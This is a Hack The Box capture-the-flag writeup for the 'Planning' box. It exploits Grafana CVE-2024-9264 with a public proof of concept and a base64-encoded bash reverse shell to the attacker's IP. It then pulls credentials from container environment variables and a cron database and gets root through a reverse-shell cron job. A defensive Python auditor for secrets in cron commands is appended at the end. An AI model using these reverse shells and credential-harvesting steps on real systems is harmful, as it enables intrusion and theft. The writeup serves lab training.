# Hack The Box - Planning Writeup

Writeup for the box Planning in Hack The Box.

## Box Info

| Name     | OS    | Difficulty |
|:-------- | ----- |:---------- |
| Planning | Linux | Easy       |

### About

## Recon

### Nmap

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning]
└─$ sudo nmap 10.10.11.68 -oA nmap/initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-11 11:52 CST
Nmap scan report for 10.10.11.68
Host is up (0.41s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds
```

### Web Service - Port 80

Opening the site redirects to `planning.htb`; after adding the domain to the hosts file, the page loads:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning]
└─$ echo "\n10.10.11.68 planning.htb" | sudo tee -a /etc/hosts

10.10.11.68 planning.htb
```

Brute-force subdomains:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt:FUZZ -u "http://planning.htb/" -H "Host: FUZZ.planning.htb" -ac -t 100 | tee hosts

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://planning.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt
 :: Header           : Host: FUZZ.planning.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

grafana                 [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 225ms]
:: Progress: [151265/151265] :: Job [1/1] :: 434 req/sec :: Duration: [0:06:17] :: Errors: 0 ::
```

This finds the `grafana.planning.htb` domain; add it to the hosts file. The site is running Grafana v11.0.0:

![image](https://hackmd.io/_uploads/HJuA1SCSxg.png)

## Shell as root in container

Grafana's official site shows that v11.0.0 has an RCE vulnerability:

{%preview https://grafana.com/security/security-advisories/cve-2024-9264/ %}

Download the PoC:

{%preview https://github.com/nollium/CVE-2024-9264?tab=readme-ov-file %}

Base64-encode the payload so that special characters do not interfere with its execution:

```bash
┌──(venv)─(parallels㉿kali)-[~/Documents/Hack The Box/Planning/CVE-2024-9264]
└─$ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjIvOTAwMSAwPiYx | base64 -d | bash" http://grafana.planning.htb
```

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.11.68] 58462
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@7ce659d667d7:~#
```

## Shell as enzo

There is a `.dockerenv` file in the root directory, which means we are inside a Docker container:

```bash
root@7ce659d667d7:~# ls -al /
ls -al /
total 64
drwxr-xr-x 1 root root 4096 Apr  4 10:23 .
drwxr-xr-x 1 root root 4096 Apr  4 10:23 ..
-rwxr-xr-x 1 root root    0 Apr  4 10:23 .dockerenv
```

The current environment variables contain a set of credentials, which can be used to SSH into the server:

```bash
root@7ce659d667d7:~# env
<SNIP>
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
```

```bash
┌──(venv)─(parallels㉿kali)-[~/Documents/Hack The Box/Planning/CVE-2024-9264]
└─$ ssh enzo@10.10.11.68
<SNIP>
enzo@planning:~$
```

### user.txt

```bash
enzo@planning:~$ cat user.txt
2154140d************************
```

## Shell as root

Checking the listening ports on the system shows a service running on port 8000:

```bash
enzo@planning:~$ ss -tuln
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
<SNIP>
tcp   LISTEN 0      511        127.0.0.1:8000      0.0.0.0:*
```

Forward the port to the local machine over SSH:

```bash
┌──(parallels㉿kali)-[~/Documents/tools/Privilege Escalation]
└─$ ssh -L 1234:localhost:8000 enzo@10.10.11.68
```

Opening the site shows that it requires credentials. Looking for further clues with linpeas turns up a suspicious file:

```bash
# linpeas.sh
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /opt/crontabs/crontab.db: New Line Delimited JSON text data
```

Its contents include the password `P4ssw0rdS0pRi0T3c`:

```bash
enzo@planning:~$ cat /opt/crontabs/crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
```

Logging in with `root` and `P4ssw0rdS0pRi0T3c` then works:

![image](https://hackmd.io/_uploads/HyIagd1Lgx.png)

Finally, create a new job that runs a reverse shell command to get onto the server as root.

![image](https://hackmd.io/_uploads/BJObGd1Lxx.png)

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Planning]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.11.68] 42154
bash: cannot set terminal process group (1469): Inappropriate ioctl for device
bash: no job control in this shell
root@planning:/#
```

### root.txt

```shell
root@planning:~# cat root.txt
71b20b41************************
```
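
The `crontab.db` finding in "Shell as root", seen from the defender's side: an added example (not part of the original writeup or of any tool used in it) that parses a newline-delimited JSON job file of the shape shown there and reports jobs whose command passes a secret as an argument, such as `zip -P <password>`. The function names, the flag list and the sample records are assumptions constructed for illustration.

```python
import json
import re
import shlex

# Constructed sample in the NDJSON shape of crontab.db; placeholder password, one bad record.
SAMPLE_DB = "\n".join([
    json.dumps({"name": "Grafana backup", "schedule": "@daily", "command":
                "/usr/bin/gzip /var/backups/g.tar && zip -P EXAMPLE-PLACEHOLDER "
                "/var/backups/g.zip /var/backups/g.tar.gz"}),
    json.dumps({"name": "Cleanup", "schedule": "* * * * *",
                "command": "/root/scripts/cleanup.sh"}),
    "{truncated record",
])

# Options whose next argument is a secret (illustrative list, not exhaustive).
SECRET_FLAGS = {"zip": {"-P", "--password"}, "sshpass": {"-p"}}
INLINE = re.compile(r"^--?pass(word|wd)?=.")  # secret glued to the option itself

def find_inline_secrets(command):
    """Return (tool, flag) pairs for secrets passed as arguments; never the value."""
    hits = []
    # Naive split on shell operators; good enough for simple job commands.
    for segment in re.split(r"&&|\|\||[;|]", command):
        try:
            argv = shlex.split(segment)
        except ValueError:              # unbalanced quotes
            argv = segment.split()
        tool = argv[0].rsplit("/", 1)[-1] if argv else ""
        for i, arg in enumerate(argv):
            if arg in SECRET_FLAGS.get(tool, ()) and i + 1 < len(argv):
                hits.append((tool, arg))
            elif INLINE.match(arg):
                hits.append((tool, arg.split("=", 1)[0]))
    return hits

def audit_job_db(text):
    """Parse NDJSON job records; return (findings, unparsable line numbers)."""
    findings, bad = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        try:
            job = json.loads(line)
        except ValueError:              # json.JSONDecodeError subclasses ValueError
            job = None
        if not isinstance(job, dict):
            bad.append(lineno)
            continue
        for tool, flag in find_inline_secrets(str(job.get("command", ""))):
            findings.append({"job": job.get("name"), "tool": tool, "flag": flag})
    return findings, bad
```

The report names the job, tool and flag only, so it can be logged or ticketed without copying the secret into yet another readable place.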